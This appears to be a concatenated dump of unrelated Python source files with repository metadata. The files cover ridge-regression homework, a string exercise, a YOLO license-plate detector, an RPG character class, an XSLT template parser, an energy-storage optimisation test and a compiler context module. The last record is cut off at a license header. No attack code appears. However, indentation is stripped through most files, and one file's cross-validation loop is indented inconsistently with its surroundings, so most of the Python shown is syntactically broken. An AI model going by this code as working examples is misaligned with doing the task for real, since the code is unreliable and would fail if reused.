Run the algorithm with the optimal λ of the previous problem on the whole D to get gλ. Compute Ein(gλ) and Eout(gλ) then select the closet answer.
Ein(gλ)=0.015,Eout(gλ)=0.020
"""
import time
import numpy as np
def ridge_reg(x, y, lmd):
z = np.linalg.inv(np.dot(x.transpose(), x) + lmd * np.eye(x.shape[1]))
return np.dot(np.dot(z, x.transpose()), y)
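# The closed form above is w = (X^T X + λI)^(-1) X^T y. A minimal sanity check
# on synthetic data (illustrative, not part of the homework runs):
# X = np.array([[1., 0.], [0., 1.]])
# y = np.array([2., 4.])
# ridge_reg(X, y, 0.0)  # -> array([2., 4.]); λ=0 reduces to plain least squares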
def err_01(x, y, w):
return np.sign(np.dot(x, w)) != y
def err_func(x, y, w, n):
e = 0
for i in range(n):
if err_01(x[i], y[i], w):
e += 1
return e / n
def read_file(f):
x_d = []
y_d = []
with open(f, 'r') as d:
for line in d:
l = line.split()
x = [1.0] + [float(v) for v in l[: -1]]
x_d.append(x)
y_d.append(int(l[-1]))
return np.array(x_d), np.array(y_d), len(y_d)
def quiz13(lmd=10):
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
w_reg = np.array(ridge_reg(x_in, y_in, lmd)).flatten()
e_in = err_func(x_in, y_in, w_reg, n_in)
e_out = err_func(x_out, y_out, w_reg, n_out)
return e_in, e_out
def quiz14():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
best_e_in = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_in, y_in, pow(10, lmd))).flatten()
e_in = err_func(x_in, y_in, w_reg, n_in)
if e_in < best_e_in:
best_e_in = e_in
w = w_reg
best_lmd = lmd
e_out = err_func(x_out, y_out, w, n_out)
return best_lmd, best_e_in, e_out
def quiz15():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
best_e_out = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_in, y_in, pow(10, lmd))).flatten()
e_out = err_func(x_out, y_out, w_reg, n_out)
if e_out < best_e_out:
best_e_out = e_out
w = w_reg
best_lmd = lmd
e_in = err_func(x_in, y_in, w, n_in)
return best_lmd, e_in, best_e_out
def quiz16():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_train = 120
n_val = 80
x_train = x_in[:120]
y_train = y_in[:120]
x_val = x_in[120:]
y_val = y_in[120:]
best_e_train = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_train, y_train, pow(10, lmd))).flatten()
e_train = err_func(x_train, y_train, w_reg, n_train)
if e_train < best_e_train:
best_e_train = e_train
w = w_reg
best_lmd = lmd
e_out = err_func(x_out, y_out, w, n_out)
e_val = err_func(x_val, y_val, w, n_val)
return best_lmd, best_e_train, e_val, e_out
def quiz17():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_train = 120
n_val = 80
x_train = x_in[:n_train]
y_train = y_in[:n_train]
x_val = x_in[120:]
y_val = y_in[120:]
best_e_val = float("inf")
best_lmd = 0
w = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_train, y_train, pow(10, lmd))).flatten()
e_val = err_func(x_val, y_val, w_reg, n_val)
if e_val < best_e_val:
best_e_val = e_val
w = w_reg
best_lmd = lmd
e_train = err_func(x_train, y_train, w, n_train)
e_out = err_func(x_out, y_out, w, n_out)
return best_lmd, e_train, best_e_val, e_out
def quiz18():
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_train = 120
n_val = 80
x_train = x_in[:n_train]
y_train = y_in[:n_train]
x_val = x_in[120:]
y_val = y_in[120:]
best_e_val = float("inf")
best_lmd = 0
for lmd in range(2, -11, -1):
w_reg = np.array(ridge_reg(x_train, y_train, pow(10, lmd))).flatten()
e_val = err_func(x_val, y_val, w_reg, n_val)
if e_val < best_e_val:
best_e_val = e_val
best_lmd = lmd
return quiz13(pow(10, best_lmd))
def quiz1920(split=40):
x_in, y_in, n_in = read_file("hw4_train.dat")
x_out, y_out, n_out = read_file("hw4_test.dat")
n_cv = split
best_e_cv = float("inf")
best_lmd = 0
    for lmd in range(2, -11, -1):
        e_cv = 0
        n_folds = int(n_in / n_cv)
        for i in range(n_folds):
            # hold out fold i for validation and train on the remaining folds
            x_val = x_in[n_cv * i: n_cv * (i + 1)]
            y_val = y_in[n_cv * i: n_cv * (i + 1)]
            x_tr = np.concatenate((x_in[: n_cv * i], x_in[n_cv * (i + 1):]))
            y_tr = np.concatenate((y_in[: n_cv * i], y_in[n_cv * (i + 1):]))
            w_reg = np.array(ridge_reg(x_tr, y_tr, pow(10, lmd))).flatten()
            e_cv += err_func(x_val, y_val, w_reg, n_cv)
        e_cv /= n_folds
        print(lmd, e_cv)
        if e_cv < best_e_cv:
            best_e_cv = e_cv
            best_lmd = lmd
w = np.array(ridge_reg(x_in, y_in, pow(10, best_lmd))).flatten()
e_in = err_func(x_in, y_in, w, n_in)
e_out = err_func(x_out, y_out, w, n_out)
return best_lmd, best_e_cv, e_in, e_out
def main():
np.random.seed()
start_time = time.time()
# print("q13: \n", quiz13())
# print("q14: \n", quiz14())
# print("q15: \n", quiz15())
# print("q16: \n", quiz16())
# print("q17: \n", quiz17())
# print("q18: \n", quiz18())
print("q19: \n", quiz1920())
print("Taken total %f seconds" % (time.time() - start_time))
if __name__ == "__main__":
main()
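# A minimal usage sketch (assumes hw4_train.dat / hw4_test.dat are present, as
# read_file above requires; the function names are the ones defined in this file):
#
#   e_in, e_out = quiz13(lmd=10)
#   print("lambda=10 -> E_in=%.3f, E_out=%.3f" % (e_in, e_out))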
|
[
"snagletsui@gmail.com"
] |
snagletsui@gmail.com
|
8f942e1b9b8645377e4237207d732ab0c7b5d47d
|
63475d9272a8661ebba37ab155f697c1be012486
|
/09_strokovyy_tip_dannyh/9.4_metody_strok._chastj_2/Удаление фрагмента.py
|
29143d0ef264ef0716944451f7eec05b89c45037
|
[] |
no_license
|
honne02/st_python
|
ce50d221c23de0ce77cd4e8f66a251024eb921bf
|
7af308cd0704c1feca942b4c44c437735485be2f
|
refs/heads/master
| 2023-04-11T00:54:07.695133
| 2021-04-26T16:42:24
| 2021-04-26T16:42:24
| 340,674,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
st = input()
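# find/rfind locate the first and last 'h'; slicing around them removes the
# whole fragment, both 'h' characters included (the input is assumed to contain 'h')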
first = st.find('h')
last = st.rfind('h')
st = st[:first] + st[(last + 1):]
print(st)
|
[
"nikita2305200413@gmail.com"
] |
nikita2305200413@gmail.com
|
8611bad8dae8a7bc4fc92b9b43a6d229c5332628
|
ebd8c6fd566fdbf4f51855c61b77c6fe475923cb
|
/detect.py
|
62a5361c2a4345b2c69d95837186e07aef9e55e5
|
[
"BSD-3-Clause"
] |
permissive
|
Shradhhaj-AI-World/Car_License_plate_recognition
|
0429a4ccbf6c1806657a303a82c35c406c7bb81c
|
e882d255f10550299d1af6cfea22073d15bef5e8
|
refs/heads/master
| 2023-01-30T20:24:44.468398
| 2020-12-15T19:15:15
| 2020-12-15T19:15:15
| 319,082,076
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,316
|
py
|
import numpy as np
import argparse
import time
import cv2
import os
import json
from PIL import Image
import io
import pytesseract
confthres=0.5
nmsthres=0.1
yolo_path="./"
class License_plate():
def __init__(self,labelsPath,cfgpath,wpath):
self.labelsPath=labelsPath
self.cfgpath=cfgpath
self.wpath=wpath
self.Lables=self.get_labels(self.labelsPath)
self.CFG=self.get_config(self.cfgpath)
self.Weights=self.get_weights(self.wpath)
self.nets=self.load_model(self.CFG,self.Weights)
self.Colors=self.get_colors(self.Lables)
def get_labels(self,labels_path):
lpath=os.path.sep.join([yolo_path, labels_path])
LABELS = open(lpath).read().strip().split("\n")
return LABELS
def get_colors(self,LABELS):
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),dtype="uint8")
return COLORS
def get_weights(self,weights_path):
weightsPath = os.path.sep.join([yolo_path, weights_path])
return weightsPath
def get_config(self,config_path):
configPath = os.path.sep.join([yolo_path, config_path])
return configPath
def load_model(self,configpath,weightspath):
print("[INFO] loading YOLO from disk...")
net = cv2.dnn.readNetFromDarknet(configpath, weightspath)
return net
def get_predection(self,image,net,LABELS,COLORS):
(H, W) = image.shape[:2]
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
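        # scale pixels to [0, 1], resize to the 416x416 network input and
        # swap BGR -> RGB for the Darknet model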
blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416),
swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
layerOutputs = net.forward(ln)
print(layerOutputs)
end = time.time()
print("[INFO] YOLO took {:.6f} seconds".format(end - start))
boxes = []
confidences = []
classIDs = []
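        # each detection row is [center_x, center_y, width, height, objectness,
        # class scores...]; box coordinates are normalised to [0, 1]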
for output in layerOutputs:
for detection in output:
scores = detection[5:]
classID = np.argmax(scores)
confidence = scores[classID]
if confidence > confthres:
box = detection[0:4] * np.array([W, H, W, H])
(centerX, centerY, width, height) = box.astype("int")
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
classIDs.append(classID)
        idxs = cv2.dnn.NMSBoxes(boxes, confidences, confthres,nmsthres)
        subImg = None  # stays None when nothing survives non-max suppression
        if len(idxs) > 0:
for i in idxs.flatten():
(x, y) = (boxes[i][0], boxes[i][1])
(w, h) = (boxes[i][2], boxes[i][3])
cv2.rectangle(image, (x, y), (x + w, y + h), [int(c) for c in COLORS[classIDs[i]]], 2)
subImg = image[y : y + h, x : x + w, :]
text = "{}: {:.4f}".format(LABELS[classIDs[i]], confidences[i])
print(boxes)
print(classIDs)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, [int(c) for c in COLORS[classIDs[i]]], 2)
return image,subImg
def main(self,image_path):
image = cv2.imread(image_path)
detected_image,croped_image=self.get_predection(image,self.nets,self.Lables,self.Colors)
pilImage = Image.fromarray(croped_image)
ext = image_path.split('.')[-1]
b = io.BytesIO()
        if ext.lower() == 'png':
            save_ext = 'PNG'
        else:
            # default to JPEG for jpg/jpeg and anything else, so save_ext is always bound
            save_ext = 'JPEG'
pilImage.save(b, save_ext)
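        # run Tesseract OCR on the cropped plate region to read the plate text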
text = pytesseract.image_to_string(pilImage, lang = 'eng')
return detected_image,text
if __name__ == "__main__":
with open('config.json') as data_file:
cred = json.load(data_file)
lp=License_plate(cred['labelsPath'],cred['cfgpath'],cred['wpath'])
path="static/a11.jpg"
image,text=lp.main(path)
print(text)
cv2.imshow("Image", image)
cv2.waitKey()
|
[
"shradhhaj7@gmail.com"
] |
shradhhaj7@gmail.com
|
e36a01c8c6ee3fc7bce36afcf8fb6864c1bf83bb
|
286703e80d78fa768717ca542de7af83d4fa29a1
|
/rules/Character.py
|
d3b4662b4c58aa77119bcfadef742cb997e0cb2c
|
[] |
no_license
|
JazzJack/Pytans
|
7e063549a22e42f5179d32f4bb602eff4f843f2a
|
87800792f6949f7c6993c2b7078ef7835ce87899
|
refs/heads/master
| 2020-04-15T07:39:05.821992
| 2012-02-15T15:08:40
| 2012-02-15T15:08:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,787
|
py
|
#!/usr/bin/python
# -*- coding: utf-8
from __future__ import division, print_function, unicode_literals
import xml.etree.ElementTree as ElementTree
import copy
import rules
from rules import defaultSkillTree
from rules.Announcement import Announcement, Action
import rules.Attributes
from rules.Dicing import roll, getNumberOfSuccesses, isSuccessful
import rules.Race as Race
from rules.Skilltree import recursiveSkillAdd
from rules.Utils import none2Empty
class Character(object):
def __init__(self, name):
self.name = name
self.attributes = rules.Attributes.Attributes()
self.skills = copy.deepcopy(defaultSkillTree)
self.vantages = []
self.WT = 8
self.RS = 0
self.SR = 0
self.exhaustion = 0
self.AP = 0
self.wounds = 0
self.maneuvers = []
self.feats = []
def rollAttribute(self, att, diff, minSuccesses = 0):
r = roll(self.attributes[att])
if minSuccesses :
return isSuccessful(r, diff, minSuccesses)
else :
return getNumberOfSuccesses(r, diff)
def soak(self, damage, sharpness):
"""
        Performs the soak (resistance) roll for the character and returns the number of wounds.
"""
d = damage
wounds = -1
damage -= self.RS
diff = sharpness - self.SR
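        # keep rolling constitution (KO) against the adjusted difficulty until the
        # remaining damage is soaked; each extra pass through the loop costs a wound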
while damage > 0 :
wounds += 1
damage -= self.rollAttribute("KO", diff)
wounds = max(0, wounds)
self.wounds += wounds
self.exhaustion += wounds
#print("%s soaked %d against the %d and got %d wounds!"%(self.name, d, sharpness, wounds))
return wounds
def doInitiative(self, diff):
self.AP = self.rollAttribute("IN", diff)
def isAlive(self):
return self.exhaustion < self.attributes["KO"] and self.wounds < 6
def reset(self):
self.wounds = 0
self.exhaustion = 0
self.AP = 0
def getSkillsDict(self):
skillsDict = {}
for s, v in self.skills.items() :
skillsDict[s] = self.getPoolSize(s)
return skillsDict
def getPoolSize(self, skill):
assert skill in self.skills
# todo: "Hart im Nehmen"
return max(1, self.skills[skill].summed() - self.exhaustion)
def rollSkill(self, skill, diff, minSuccesses = 0, att=None) :
assert skill in self.skills
if att is not None and att in self.attributes:
diff = max(1, diff + self.attributes.getModifier(att))
r = roll(self.getPoolSize(skill))
if minSuccesses :
return isSuccessful(r, diff, minSuccesses)
else:
return getNumberOfSuccesses(r, diff)
def attack(self, weapon, maneuver, target, options = None):
"""
        Creates an announcement object and reduces the AP.
"""
attack = Action(self, maneuver, weapon, options)
assert self.AP >= 0
announcement = Announcement(attack, target)
return announcement
def gainAP(self):
gain = 3 - self.attributes.getModifier("SN")
self.AP = min(self.attributes["GE"], self.AP + gain)
print("Character %s got %d AP (total %d)"%(self.name, gain, self.AP))
def __str__(self):
indent = " "
result = "<Character " + self.name + "\n"
for att, _ in self.attributes:
result += indent + att + " = " + str(self.attributes[att]) + "\n"
result += ">"
return result.encode("utf-8")
def __repr__(self):
return self.__str__()
def setRace(self, race):
self.race = race
self.attributes.addModDict(race.attributeMods)
def addVantage(self, vantage):
self.vantages.append(vantage)
self.attributes.addModDict(vantage.mods)
def getXPCosts(self):
costs = self.race.getXPCosts()
costs += self.attributes.getXPCosts()
costs += self.skills.getTotalCosts()
for v in self.vantages:
costs += v.costs
for m in self.maneuvers:
costs += m.getXPCosts()
for f in self.feats:
costs += f.costs
return costs
def addFeat(self, feat):
self.feats.append(feat)
def readCharacterFromXML(filename):
tree = ElementTree.parse(filename)
xChar = tree.getroot()
# Name
char = Character(xChar.find("Name").text)
# Race
raceName = xChar.find("Rasse").text
char.setRace(Race.getRaceByName(raceName))
# Attributes
for att in xChar.find("Attribute"):
char.attributes[rules.Attributes.mapping[att.tag]] = int(att.get("value"))
# Vantages
for v in none2Empty(xChar.find("Teile")) :
vantageName = v.get("id")
if vantageName in rules.vantages :
char.addVantage(rules.vantages[vantageName])
else :
import warnings
warnings.warn("Unknown Vantage '%s'"%vantageName)
# Feats
for f in none2Empty(xChar.find("Sonderfertigkeiten")) :
featName = f.get("id")
if featName in rules.feats:
char.addFeat(rules.feats[featName])
else :
import warnings
warnings.warn("Unknown Feat '%s' in char %s"%(featName, char.name))
# Skills
recursiveSkillAdd(char.skills, xChar.find("Fertigkeiten"))
# Maneuvers
for xManeuver in none2Empty(xChar.find("ManöverListe")):
maneuverName = xManeuver.get("id")
if maneuverName in rules.maneuvers:
maneuver = rules.maneuvers[maneuverName].copy()
maneuver.level = int(xManeuver.get("stufe"))
char.maneuvers.append(maneuver)
else :
import warnings
warnings.warn("Unknown Maneuver %s in Char %s"%(maneuverName, char.name))
return char
|
[
"klaus.greff@gmx.net"
] |
klaus.greff@gmx.net
|
5ab24c6a8ec0f36df320431b89ea6470b8909a7e
|
f4b5721c6b3f5623e306d0aa9a95ec53461c1f89
|
/backend/src/gloader/xml/xslt/AttributeValueTemplate.py
|
7f4c982f79e53d298825f773d7843f57e306cd56
|
[
"MIT"
] |
permissive
|
citelab/gini5
|
b53e306eb5dabf98e9a7ded3802cf2c646f32914
|
d095076113c1e84c33f52ef46a3df1f8bc8ffa43
|
refs/heads/uml-rename
| 2022-12-10T15:58:49.578271
| 2021-12-09T23:58:01
| 2021-12-09T23:58:01
| 134,980,773
| 12
| 11
|
MIT
| 2022-12-08T05:20:58
| 2018-05-26T17:16:50
|
Python
|
UTF-8
|
Python
| false
| false
| 3,437
|
py
|
########################################################################
#
# File Name: AttributeValueTemplate.py
#
#
"""
Implementation of AVTs from the XSLT Spec.
WWW: http://4suite.com/4XSLT e-mail: support@4suite.com
Copyright (c) 1999-2000 FourThought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
import re, string
from xml.xslt import XsltException, Error
from xml.xpath import XPathParser, Conversions
g_braceSplitPattern = re.compile(r'([\{\}])')
class AttributeValueTemplate:
def __init__(self, source,reparse = 1):
self.source = source
if reparse:
self._plainParts = []
self._parsedParts = []
self._parse()
def _parse(self):
parser = XPathParser.XPathParser()
curr_plain_part = ''
curr_template_part = ''
in_plain_part = 1
split_form = re.split(g_braceSplitPattern, self.source)
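        # the capturing group keeps '{' and '}' as their own list items, so a
        # doubled brace appears as delimiter, empty string, delimiter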
skip_flag = 0
for i in range(len(split_form)):
segment = split_form[i]
if skip_flag:
skip_flag = skip_flag - 1
continue
if segment in ['{', '}']:
#Here we are accounting for a possible blank segment in between
try:
next = split_form[i + 1] + split_form[i + 2]
except IndexError:
next = None
if next == segment:
if in_plain_part:
curr_plain_part = curr_plain_part + segment
else:
curr_template_part = curr_template_part + segment
skip_flag = 2
elif segment == '{':
if in_plain_part:
self._plainParts.append(curr_plain_part)
in_plain_part = 0
curr_plain_part = ''
else:
raise XsltException(Error.AVT_SYNTAX)
else:
if not in_plain_part:
parsed = parser.parseExpression(curr_template_part)
self._parsedParts.append(parsed)
in_plain_part = 1
curr_template_part = ''
else:
raise XsltException(Error.AVT_SYNTAX)
else:
if in_plain_part:
curr_plain_part = curr_plain_part + segment
else:
curr_template_part = curr_template_part + segment
if in_plain_part:
self._plainParts.append(curr_plain_part)
else:
raise XsltException(Error.AVT_SYNTAX)
def evaluate(self, context):
result = ''
expansions = map(
lambda x, c=context: Conversions.StringValue(x.evaluate(c)),
self._parsedParts
)
for i in range(len(self._parsedParts)):
result = result + self._plainParts[i] + expansions[i]
result = result + self._plainParts[-1]
return result
def __repr__(self):
return self.source
def __getinitargs__(self):
return (self.source, 0)
def __getstate__(self):
return (self._plainParts,self._parsedParts)
def __setstate__(self, state):
        # restore the plain and parsed parts captured by __getstate__
self._plainParts,self._parsedParts = state
|
[
"maheswar@MacBook-Pro.local"
] |
maheswar@MacBook-Pro.local
|
f8d4394776a7d44072016fdd75ad9a9b43163c98
|
c5fcb8259f13f2fb79b3ec10edcbe29cffeae61d
|
/algo/test5.py
|
6d05ce4e7453874ea59e6f0d68d72864c71deeb4
|
[] |
no_license
|
verahsu860604/aesda
|
1d66880e93db60149772d6d87801babca17b8720
|
6eebe17ef55d3e35acb4ae761ef4d2340f8212e6
|
refs/heads/master
| 2022-11-18T05:37:25.553413
| 2020-05-21T07:18:37
| 2020-05-21T07:18:37
| 242,245,109
| 1
| 0
| null | 2022-11-10T17:27:36
| 2020-02-21T22:57:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,914
|
py
|
import parameters
import config
import market
import energy_source
import mpc_solver
import matplotlib.pyplot as plt
import json
import numpy as np
from time import sleep
import cyclic_coordinate
import pareto
parameters = {
'energy_sources': [
{
'soc_profile_max_power_downward': 20,
'dod_profile_change_th': 0.2,
'soc_profile_min_output_th': 30,
'cost': 470,
'efficiency_upward': 0.78,
'soc_profile_max_power_upward': 20,
'soc_profile_max_input_th': 70,
'efficiency_downward': 0.78,
'self_discharge_ratio': 0,
'other_cost': 0,
'soc_profile_energy_scale': 8
},
{
'dod_profile_change_th': 0.2,
'efficiency_upward': 0.95,
'efficiency_downward': 0.95,
'c4': 40000,
'c1': 10000000,
'soc_profile_max_power_downward': 10,
'c5': 10000,
'd4': 30,
'self_discharge_ratio': 0,
'd2': 4,
'c6': 3000,
'cost': 310,
'c3': 100000,
'other_cost': 0,
'd6': 100,
'd3': 17,
'd5': 60,
'soc_profile_min_output_th': 0,
'c2': 1000000,
'd1': 2,
'soc_profile_max_power_upward': 10,
'soc_profile_energy_scale': 4,
'soc_profile_max_input_th': 100
}
],
'markets': [
{
"time_window_in_delivery": 4,
# Primary
"planning_phase_length": 60,
"selection_phase_length": 60,
"schedule_phase_length": 60,
"delivery_phase_length": 60,
"price_cyclic_n_upward": 2,
"price_cyclic_n_downward": 2,
"price_cyclic_eps_downward": 80,
"price_cyclic_eps_upward": 16,
"max_feasible_selling_price": 250,
"min_feasible_selling_price": 150,
"min_feasible_buying_price": 1,
"max_feasible_buying_price": 20,
"setpoint_interval": 1,
# "percentage_fixed": True,
'price_data_path': 'data/primary_price.csv',
'setpoint_data_path': 'data/primary_setpoint.csv'
},
{
"time_window_in_delivery": 4, # Secondary
"planning_phase_length": 120,
"selection_phase_length": 120,
"schedule_phase_length": 120,
"delivery_phase_length": 120,
"setpoint_interval": 15,
"price_cyclic_n_upward": 2,
"price_cyclic_n_downward": 2,
"price_cyclic_eps_downward": 80,
"price_cyclic_eps_upward": 16,
"max_feasible_selling_price": 250,
"min_feasible_selling_price": 150,
"min_feasible_buying_price": 1,
"max_feasible_buying_price": 20,
# "percentage_fixed": True,
'price_data_path': 'data/primary_price.csv',
'setpoint_data_path': 'data/primary_setpoint.csv'
},
# {
# "time_window_in_delivery": 4, # Tertiary
# "planning_phase_length": 960,
# "selection_phase_length": 960,
# "schedule_phase_length": 960,
# "delivery_phase_length": 960,
# "setpoint_interval": 60,
# # 'price_data_path': 'data/primary_price.csv',
# # 'setpoint_data_path': 'data/primary_setpoint.csv'
# },
],
'config':{
'planning_horizon': 360,
'soh_update_interval': 1440,
'tot_timestamps': 10080
}
}
def get_parameters():
return parameters
data = get_parameters()
config = config.Config(**data['config'])
energy_sources = [energy_source.EnergySource(**kwargs) for kwargs in data['energy_sources']]
for ess in energy_sources:
ess.tuning_parameter_fit()
markets = [market.Market(**kwargs) for kwargs in data['markets']]
mpc = mpc_solver.MPCSolver(config=config, markets=markets, energy_sources=energy_sources)
# Fake run: enumerate the candidate solutions without solving the MPC (really_run=False)
cc = cyclic_coordinate.CyclicCoordinate(markets, mpc, [10, 10], really_run=False)
solutions_fake = cc.Algo5()
print("totl: " + str(len(solutions_fake)))
cc = cyclic_coordinate.CyclicCoordinate(markets, mpc, [10, 10])
solutions = cc.Algo5()
print(solutions[0])
# pe = pareto.ParetoEfficient(solutions)
# inefficient_list, efficient_list = pe.pareto_analysis()
# tuple(Revenue, value_i(useless), soc_record, soh for each device, power record, prices, percentages)
# (216.29629629629628, 2, array([[1. , 1. ], [0.95061731, 1. ]]),
# (1.0, 1.0), array([[[ 0., 0.], [24., 0.]],[[ 0., 0.],[ 0., 12.]]]),
# [2.2222222222222223, 18.02469135802469, 2.2222222222222223, 18.02469135802469, 2.2222222222222223, 18.02469135802469],
# (6.666666666666667, 10.0, 'free'))
# assert len(solutions) == 36
|
[
"justryit8@gmail.com"
] |
justryit8@gmail.com
|
669a53c965306f6b2561c3113c8f5d9599eb811b
|
5f1877494c8da736b675b02480e42d79b570bbcc
|
/llpy16/context.py
|
a2bc37b84c453e454cdb04994295762ebad2c278
|
[] |
no_license
|
ojii/llpy16
|
757de9920a7c15e204ffbfc72995e713717e6ca4
|
f9ff6a58ddb46a26b807012ba57d37fef85e51a1
|
refs/heads/master
| 2021-01-16T19:32:40.354429
| 2013-03-19T05:21:12
| 2013-03-19T05:21:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,280
|
py
|
# -*- coding: utf-8 -*-
import ast
from collections import defaultdict
from contextlib import contextmanager
import os
import imp
from llpy16.assembler import hexify
class Function(object):
def __init__(self, name, args, node, deferred=True):
self.name = name
self.args = args
self.node = node
self.deferred = deferred
class Namespace(object):
def __init__(self):
self.constants = {}
self.functions = {}
self.extensions = {}
self.configs = {}
self.data = {}
class Register(object):
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class RegisterOperation(object):
def __init__(self, left, right, operator):
self.left = left
self.right = right
self.operator = operator
def __str__(self):
return '%s %s %s' % (hexify(self.left), self.operator, hexify(self.right))
class Context(object):
_sep = '__'
def __init__(self, paths):
self._paths = paths
self._namespaces = defaultdict(Namespace)
self._current_namespace = ''
self._modules = []
# Public API
def find_import(self, name, assembler):
if name in self._modules:
# already imported
return
bits = name.split('.')
for path in self._paths:
pypath = os.path.join(path, *bits) + '.py'
llpath = os.path.join(path, *bits) + '.llpy16'
found = False
if os.path.exists(pypath):
module = imp.load_source(name, pypath)
                with self.namespace(name):
                    # use a separate loop variable so the module name is not shadowed
                    for attr in getattr(module, 'LLPY16_EXTS', []):
                        self.define_extension(attr, getattr(module, attr))
                    for attr in getattr(module, 'LLPY16_CONST', []):
                        self.define_constant(attr, getattr(module, attr))
                    for attr in getattr(module, 'LLPY16_DATA', []):
                        self.define_constant(attr, self.expand_name(getattr(module, attr)))
initialize = getattr(module, getattr(module, 'LLPY16_INIT', '-'), None)
if callable(initialize):
initialize(assembler, self)
found = True
if os.path.exists(llpath):
with open(llpath) as fobj:
return fobj.read()
if found:
return
raise ImportError(name)
def define_extension(self, name, handler):
self.current_namespace.extensions[name] = handler
def get_extension(self, name):
return self.current_namespace.extensions[name]
def define_constant(self, name, value):
self.current_namespace.constants[name] = value
def get_constant(self, name):
return self.current_namespace.constants[name]
def define_function(self, name, args, node, deferred=True):
expanded_name = self.expand_name(name)
self.current_namespace.functions[name] = function = Function(expanded_name, args, node, deferred)
return function
def get_function(self, name):
return self.current_namespace.functions[name]
def set_config(self, key, value):
self.current_namespace.configs[key] = value
def get_config(self, key):
return self.current_namespace.configs[key]
def resolve_function(self, node, assembler):
name, namespace = self.resolve_name(node.func)
with self.namespace(namespace):
try:
ext = self.get_extension(name)
except KeyError:
try:
return self.get_function(name)
except KeyError:
raise NameError('%s.%s' % (namespace, name))
args, kwargs = self._call_to_args_kwargs(node)
ext(assembler, self, *args, **kwargs)
def expand_name(self, name):
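        # e.g. expand_name('draw') inside namespace 'gfx.sprites' -> 'gfx__sprites__draw'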
return self._current_namespace.replace('.', self._sep) + self._sep + name
@contextmanager
def namespace(self, namespace):
old = self._current_namespace
self._current_namespace = namespace
try:
yield
finally:
self._current_namespace = old
# Private API
@property
def current_namespace(self):
return self._namespaces[self._current_namespace]
def resolve_name(self, thing):
if isinstance(thing, ast.Name):
name = thing.id
namespace = self._current_namespace
elif isinstance(thing, ast.Attribute):
bits = []
value = thing
while isinstance(value, ast.Attribute):
bits.append(value.attr)
value = value.value
if not isinstance(value, ast.Name):
raise TypeError()
bits.append(value.id)
bits.reverse()
name = bits.pop()
namespace = '.'.join(bits)
else:
raise TypeError(thing)
return name, namespace
def _call_to_args_kwargs(self, node):
def _get_value(thing):
if isinstance(thing, ast.Str):
return thing.s
elif isinstance(thing, ast.Num):
return thing.n
elif isinstance(thing, ast.Tuple):
return tuple(map(_get_value, thing.elts))
elif isinstance(thing, ast.List):
return list(map(_get_value, thing.elts))
elif isinstance(thing, ast.Dict):
return {_get_value(key): _get_value(value) for key, value in zip(thing.keys, thing.values)}
elif isinstance(thing, ast.BinOp):
left = _get_value(thing.left)
right = _get_value(thing.right)
if isinstance(thing.op, ast.Add):
operator = '+'
elif isinstance(thing.op, ast.Sub):
operator = '-'
else:
raise TypeError(thing.op)
if isinstance(left, int) and isinstance(right, int):
return (left + right) if operator == '+' else (left - right)
elif isinstance(left, (Register, int)) and isinstance(right, (Register, int)):
return RegisterOperation(left, right, operator)
else:
raise TypeError("%r %s %r" % left, operator, right)
else:
name, namespace = self.resolve_name(thing)
if name == name.upper() and len(name) == 1 and namespace == self._current_namespace:
return Register(name)
else:
with self.namespace(namespace):
try:
return self.get_constant(name)
except KeyError:
try:
return self.get_function(name).name
except KeyError:
                            print(self.current_namespace.functions)
raise NameError(name)
args = map(_get_value, node.args)
kwargs = {keyword.arg: _get_value(keyword.value) for keyword in node.keywords}
return args, kwargs
|
[
"ojiidotch@gmail.com"
] |
ojiidotch@gmail.com
|
86f816fa4c07689b4bbb27949c7e824974c6af10
|
c46754b9600a12df4f9d7a6320dfc19aa96b1e1d
|
/tests/models/deit/test_image_processing_deit.py
|
21dc3d9e95a79f48a9c4a6af5658a0715ce5faf6
|
[
"Apache-2.0"
] |
permissive
|
huggingface/transformers
|
ccd52a0d7c59e5f13205f32fd96f55743ebc8814
|
4fa0aff21ee083d0197a898cdf17ff476fae2ac3
|
refs/heads/main
| 2023-09-05T19:47:38.981127
| 2023-09-05T19:21:33
| 2023-09-05T19:21:33
| 155,220,641
| 102,193
| 22,284
|
Apache-2.0
| 2023-09-14T20:44:49
| 2018-10-29T13:56:00
|
Python
|
UTF-8
|
Python
| false
| false
| 4,508
|
py
|
# coding=utf-8
# Copyright 2021 HuggingFace Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
